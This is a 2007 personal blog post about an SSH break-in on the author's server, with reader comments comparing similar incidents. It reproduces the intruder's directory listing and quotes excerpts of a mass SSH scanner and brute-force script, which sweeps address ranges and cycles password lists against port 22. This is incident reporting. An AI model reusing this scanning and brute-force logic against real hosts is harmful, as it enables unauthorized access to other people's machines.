Parsed Participle

The personal weblog of Faiz Kazi: Mostly oddities in programming, life in Japan, occasionally music.

[ Home | RSS 2.0 | ATOM 1.0 ]

Mon, 19 Nov 2007

Sod off, loathsome script-kiddie

Someone (or should I say, something, because this looks like some auto-scanning script) gained access via SSH using one of the unused user accounts on this server. Nothing very spectacular, especially since everything was easily visible with ps, and even who. the IP seems to be: 86.123.17.188.

I could see this when I ran who: 

faiz     pts/3        Nov 19 13:56 (p02a702.tokynt01.ap.so-net.ne.jp)
vasanth  pts/2        Nov 18 23:37 (86.123.17.188:S.0)

Looks like it never got beyond that, though I saw some hundreds of './ssh' processes running, which, after summarily killing off, I found and archived the offending scripts: These were stored and running off of the directory /var/tmp/vi.recover/irc/ as the user 'vasanth'. I suspect a weak password lead to a brute-force SSH break-in. Not at all a bother, but nothing that can't be fixed by an iptables '-m recent' filter.

Contents of the directory the intruder was running the scripts from: 
var/
`-- tmp
    `-- vi.recover
        `-- irc
            |-- 1
            |-- 10
            |-- 11
            |-- 12
            |-- 13
            |-- 14
            |-- 15
            |-- 16
            |-- 17
            |-- 18
            |-- 19
            |-- 2
            |-- 20
            |-- 209.85.ps.22
            |-- 21
            |-- 22
            |-- 23
            |-- 24
            |-- 25
            |-- 26
            |-- 27
            |-- 28
            |-- 29
            |-- 3
            |-- 30
            |-- 31
            |-- 32
            |-- 33
            |-- 34
            |-- 35
            |-- 36
            |-- 37
            |-- 38
            |-- 39
            |-- 4
            |-- 40
            |-- 41
            |-- 42
            |-- 43
            |-- 44
            |-- 45
            |-- 46
            |-- 47
            |-- 48
            |-- 49
            |-- 5
            |-- 50
            |-- 51
            |-- 52
            |-- 53
            |-- 54
            |-- 55
            |-- 56
            |-- 57
            |-- 58
            |-- 59
            |-- 6
            |-- 60
            |-- 61
            |-- 62
            |-- 63
            |-- 64
            |-- 7
            |-- 8
            |-- 9
            |-- all
            |-- common
            |-- full
            |-- go.sh
            |-- mfu.txt
            |-- pass_file
            |-- ps
            |-- r00t
            |-- skan
            |-- ss
            |-- ssh
            `-- x

Some samples from the scripts: Note: though no harm can come if you try running these binaries as a non-root user (if you are running Linux, that is), it's probably a good idea not to run the scripts in this archive - there's no easy way to be sure what they actually do. 

$ cat /var/tmp/vi.recover/irc/go.sh 
./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > mfu.txt
./ssh-scan
rm -f bios.txt


#!/bin/bash

clear

rm -rf $1.ps.$2

echo "#=====#==================================#=====#"
echo "#= R =# SSH AUTO SCANNER BY REGELE & CO  #= R =#"
echo "#= E =#-------   #BlackCat TEAM   -------#= E =#"
echo "#= G =#----------------------------------#= G =#"
echo "#= E =# � ALL RIGHTS RESERVED TO Regele �#= E =#"
echo "#= L =#   Now Just Sit Back End Relax    #= L =#"
echo "#= E =#   IPs founder... ACTIVATING!!!   #= E =#"
echo "#Range from -> $1.0.0"
echo "#Range   to -> $1.255.255"
echo "#Looking on -> PORT $2"

./ps $1 $2

sleep 5

cat $1.ps.$2 |sort |uniq > mfu.txt

oopsnr2=`grep -c . mfu.txt`

sleep 5
echo "#---Relax ... Take it Easy---#"

cat 1 > pass_file
sleep 3
./ssh 150

cat 2 > pass_file
sleep 3
./ssh 150

#... and so on

echo "# It's over, you cand go outside and play now #"
Yup, script 'kiddie' all right.

posted: 11:55 | path: /security | permanent link to this entry
comments: 3
Posted by gavin8or at Mon Dec 10 13:07:56 2007
Hmm are you sure that he simply accessed it using a weak password on a user account? I'm only wondering because I've seen this exact same script installed using a user account that didn't have a shell in /etc/passwd. I don't know...

Secondly, how was the exploiter able to run the script? It would seem that it has to be run as root? Did he somehow execute the script as root?

Posted by Faiz at Wed Dec 12 05:37:42 2007
Well, the script wasn't running as root, but as the user mentioned above... whose password was sadly, the same as his username.

I'm not sure how the script kick-started itself. I'd meant to have a look at it and figure it out, but my attention span nipped that endeavor in the bud...

Posted by Jim McNamara at Sun Dec 30 20:28:14 2007
The same script got me this past week. I can guarantee it wasn't a brute force ssh, as my servers are all set for no password authentication, they only accept key based auth. The script came in as user www-data, which is the default debian apache user. There weren't any keys the www-data home, so I'm mystified how they got in. In my case they hit 2 of my servers, and pushed the processors hard, top had outputs like 9.00 7.00 7.50 on dual processor machines, all from the ./ssh 150 process happening about 150-200 times. lsof showed a server in Germany, sub.something.de, which I forgot to document in my rush to secure things.

I didn't see anything done as root, which is good. I didn't have anything below /var/tmp/vi.recover, and the process I used to kill the ssh sessions (ps aux|grep www-data | cut -d ' ' -f 2 |xargs kill -15) erased all traces of whatever they did.

Name:


E-mail:


URL:


Comment:




Sections

< November 2007 >
SuMoTuWeThFrSa
     1 2 3
4 5 6 7 8 910
11121314151617
18192021222324
252627282930 

[ Home | RSS 2.0 | ATOM 1.0 ]